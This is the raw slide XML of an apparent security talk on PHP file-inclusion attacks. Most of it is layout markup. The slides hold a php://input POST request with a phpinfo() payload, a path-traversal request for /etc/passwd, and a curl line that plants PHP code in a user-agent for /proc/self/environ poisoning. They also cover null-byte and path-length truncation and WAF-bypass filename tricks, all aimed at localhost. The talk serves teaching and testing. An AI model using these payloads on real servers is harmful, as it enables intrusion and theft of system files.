        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1773238"/>
            <a:ext cx="7772400" cy="45354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 name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="1071563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8">
              <a:lum bright="-34000" contrast="-2000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1033" name="Picture 50" descr="StratPMS1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:srcRect l="4964" t="15845" r="5733" b="20773"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="142844" y="6357938"/>
            <a:ext cx="1285875" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1071546"/>
            <a:ext cx="9144000" cy="285752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="18000">
                <a:srgbClr val="FA640E">
                  <a:alpha val="45000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gradFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="me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3" r:id="rId3"/>
    <p:sldLayoutId id="2147483716" r:id="rId4"/>
    <p:sldLayoutId id="2147483715" r:id="rId5"/>
  </p:sldLayoutIdLst>
  <p:transition spd="med">
    <p:fade/>
  </p:transition>
  <p:hf hdr="0" ftr="0"/>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Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="358775" indent="-358775" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="300"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:buChar char="•"/>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="719138" indent="-358775" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="300"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1079500" indent="-358775" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="300"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>
        <a:buChar char="•"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1439863" indent="-358775" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="300"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr sz="1600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1798638" indent="-358775" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="300"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2255838" indent="-358775" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="300"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2713038" indent="-358775" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="300"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3170238" indent="-358775" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="300"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="300"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3627438" indent="-358775" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="300"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="30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BB26B-EFB9-4C18-8726-E2607CF1DA51}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7/15/2014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C788C5-6DEA-42E9-AEF6-85BF57319C6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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>hp://input stream example</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1"/>
              <a:t>fitest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1"/>
              <a:t>rfi.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>=php://input HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Accept-Encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>: identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Content-Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>: 81</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Accept-Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1"/>
              <a:t>en-us,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>=0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>: close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1"/>
              <a:t>html,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1"/>
              <a:t>xhtml+xml,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1"/>
              <a:t>xml;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>=0.9,*/*;q=0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>: fimap.googlecode.com/v09_svn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(); ?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136546054"/>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inclusions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uploaded files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> files (Unix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Log files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> database files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Temporary files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230128453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Truncation technique</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Null byte \0 or %00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File path limitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/////////////////////////////////////////</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/./././././././././././././././././././././././.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (nix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>././././././././././././././././././././././././</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (win)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4170129225"/>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Funny characters </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\, / and . Ignored at end of filename (patched)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;space&gt; ignored at end of filename (sometimes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt; = asterisk (index.&lt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; = question mark (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>index.p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;p)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“ = dot (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>index”php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Great for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>obfuscation/WAF bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1517727046"/>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Examples, examples, examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>localhost/fitest/rfi.php?page=../../../../../../etc/passwd%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>curl –A “&lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>(); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>?&gt;” http://localhost/fitest/rfi.php?page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>=../../../../../../proc/self/environ%00</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" smtClean="0"/>
              <a:t>php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>-r 'include("a/../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" err="1"/>
              <a:t>str_repeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>("/.", 2027)."/.append.inc"); &lt;- works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>php -r 'include("./../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" err="1"/>
              <a:t>str_repeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0"/>
              <a:t>("/.", 2027)."/.append.inc"); &lt;- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" dirty="0" err="1"/>
              <a:t>Failz</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4275906773"/>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STEROIDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
